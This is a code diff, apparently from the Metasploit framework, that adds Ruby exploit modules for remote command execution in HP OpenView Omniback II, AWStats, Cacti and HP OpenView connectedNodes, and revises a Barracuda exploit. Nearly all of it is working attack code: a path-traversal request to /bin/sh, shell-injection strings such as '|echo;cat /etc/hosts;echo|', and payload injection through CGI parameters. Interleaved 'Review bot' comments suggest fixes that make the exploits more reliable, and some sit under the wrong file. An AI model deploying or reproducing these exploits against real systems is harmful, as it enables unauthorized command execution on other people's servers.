diff --git a/modules/exploits/unix/misc/openview_omniback_exec.rb b/modules/exploits/unix/misc/openview_omniback_exec.rb new file mode 100644 index 0000000000..9211019868 --- /dev/null +++ b/modules/exploits/unix/misc/openview_omniback_exec.rb 
@@ -0,0 +1,116 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Misc::OpenView_Omniback_Execute < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP OpenView Omniback II Command Execution', + 'Description' => %q{ + This module uses a vulnerability in the OpenView Omniback II + service to execute arbitrary commands. This vulnerability was + discovered by DiGiT and his code was used as the basis for this + module. + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3778 $', + 'References' => + [ + ['OSVDB', '6018'], + ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'], + ['MIL', '46'], + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'Automatic Target', { }] + ], + 'DisclosureDate' => 'Feb 28 2001', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(5555) + ], self.class) + end + + def check + connect + + poof = + "\x00\x00\x00.2"+ + "\x00 a"+ + "\x00 0"+ + "\x00 0"+ + "\x00 0"+ + "\x00 A"+ + "\x00 28"+ + "\x00/../../../bin/sh"+ + "\x00\x00"+ + "digit "+ + "AAAA\n\x00" + + sock.put(poof) + sock.put("echo /etc/*;\n") + res = sock.get_once(-1, 5) + disconnect + + if (not (res and res.length > 0)) + print_status("The remote service did not reply to our request") + return Exploit::CheckCode::Safe + end + + if (res =~ /passwd|group|resolv/) + print_status("The remote service is exploitable") + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + + def exploit + connect + + poof = + "\x00\x00\x00.2"+ + "\x00 a"+ + "\x00 0"+ + "\x00 0"+ + "\x00 0"+ + "\x00 A"+ + "\x00 28"+ + "\x00/../../../bin/sh"+ + "\x00\x00"+ + "digit "+ + "AAAA\n\x00" + + sock.put(poof) + sock.put(payload.encoded + ";\n") + res = sock.get_once(-1, 5) + + if (not (res and res.length > 0)) + print_status("The 
remote service did not reply to our request") + disconnect + return + end + + print(res) + + handler + disconnect + end + +end +end diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb new file mode 100644 index 0000000000..3a16df13ee --- /dev/null +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb 
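Review bot: In both `check` and `exploit` the `disconnect` call only runs on the happy path, so an exception raised by `sock.put` or `sock.get_once` (a timeout or a reset) leaves the connection open; wrap the exchange in `begin … ensure disconnect end` in each method unless the framework's cleanup hook is already relied on for that. The `poof` request literal is duplicated byte-for-byte between the two methods, so moving it into one private method that both call keeps them from drifting apart. The guard `if (not (res and res.length > 0))` reads more naturally as `unless res && !res.empty?`, and `check` returning `CheckCode::Safe` when there was no reply at all conflates "no answer" with "not vulnerable", which the status message only partly mitigates.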
@@ -0,0 +1,92 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::AWStats_ConfigDir_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AWStats configdir Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 + are vulnerable. + }, + 'Authors' => [ 'Matteo Cantoni ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['OSVDB', '13002'], + ['BID', '12298'], + ['CVE', '2005-0116'], + ['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'], + ['MIL', '8'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jan 15 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'configdir' => '|echo;cat /etc/hosts;echo|' + } + }, 25) + + if (res and res.body.match(/localhost/)) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + + def exploit + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'configdir' => %Q!|echo 'YYY'; #{payload.encoded}; echo 'YYY'|! 
+ } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response from the server") + end + end + +end +end diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index e3a14aac04..d08385046a 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -53,7 +53,11 @@ class Exploits::Unix::Webapp::Barracuda_Image_Execution < Msf::Exploit::Remote } }, 25) - res.match(/localhost/) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe + if (res and res.body.match(/localhost/)) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe end def exploit @@ -66,11 +70,18 @@ class Exploits::Unix::Webapp::Barracuda_Image_Execution < Msf::Exploit::Remote }, 25) if (res) - print_status("The server returned: #{res.code}") + print_status("The server returned: #{res.code} #{res.message}") print("") - m = res.match(/YYY(.*)YYY/) - print(m[1]) if m + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + else print_status("No response from the server") end diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb new file mode 100644 index 0000000000..33b72f90f8 --- /dev/null +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb 
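Review bot: The info hash uses the key `'Authors'` while the omniback module in this same commit uses `'Author'`; if update_info only recognises `'Author'`, the credited authors silently drop out of the module metadata, so this should read `'Author' => [ 'Matteo Cantoni ', 'hdm' ]` here and likewise in the cacti and connectedNodes modules. In `exploit`, `res.body.match(/YYY(.*)YYY/)` uses a `.` that does not cross newlines, yet each `echo 'YYY'` emits its marker followed by a newline with the command output in between, so unless the CGI rewrites the pipe output onto a single line a multi-line result falls through to "This server may not be vulnerable"; `/YYY(.*)YYY/m` captures it, and the same pattern appears in the barracuda and cacti hunks. `check` returns `CheckCode::Safe` for a nil response, so a failed connection is reported the same as a patched host; at least a status line distinguishing the two, as `exploit` already does, would help the operator.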
@@ -0,0 +1,94 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::Cacti_GraphImage_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cacti graph_image.php Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + Raxnet Cacti 'graph_image.php' script. All versions of Raxnet Cacti prior to + 0.8.6-d are vulnerable. + }, + 'Authors' => [ 'David Maciejak ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['BID', '14042'], + ['MIL', '96'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jan 15 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]), + ], self.class) + end + + def exploit + # Obtain a valid image ID + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'action' => 'list' + } + }, 10) + + if (not res) + print_status("The server returned: #{res.code} #{res.message}") + return + end + + m = res.body.match(/local_graph_id=(.*?)&/) + if (not m) + print_status("Could not locate a valid image ID") + return + end + + # Trigger the command execution bug + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'local_graph_id' => m[1], + 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n" + } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response 
from the server") + end + end + +end +end diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb new file mode 100644 index 0000000000..1eebc03961 --- /dev/null +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb 
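Review bot: The first guard in `exploit`, `if (not res)`, then interpolates `res.code` and `res.message` into the status line, which raises NoMethodError on nil in exactly the case the guard is testing for; the body should be `print_status("No response from the server")` (as the final branch of the same method already does) followed by `return`. The `'DisclosureDate' => 'Jan 15 2005'` is identical to the awstats module's date in this commit although the BID reference differs, so it looks copied and is worth verifying against the advisory. Both requests go to `datastore['URI']`, which the option describes as the path to graph_view.php, while the module name and description refer to graph_image.php; a one-line comment above `register_options` stating which script is requested and why would avoid confusion.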
@@ -0,0 +1,75 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::OpenView_ConnectedNodes_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Openview connectedNodes.ovpl Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + HP OpenView connectedNodes.ovpl CGI application. The results of the command + will be displayed to the screen. + }, + 'Authors' => [ 'Valerio Tesei ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['OSVDB', '19057'], + ['BID', '14662'], + ['CVE', '2005-2773'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Aug 25 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]), + ], self.class) + end + + def exploit + + # Trigger the command execution bug + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'node' => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"! + } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response from the server") + end + end + +end +end
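Review bot: `print("")` after the status line in `exploit` emits nothing and is a no-op; either drop it or, if a blank separator line was intended, print a newline explicitly — the same statement appears in the awstats, barracuda and cacti hunks. The blank line directly after `def exploit` is inconsistent with the other modules in this commit. The `%Q!…!` value handed to `node` embeds a raw byte via `#{0xa3.chr}` with no explanation; a short comment above the request stating why that particular byte is substituted for newlines would help the next maintainer, since the reason is not evident from the code.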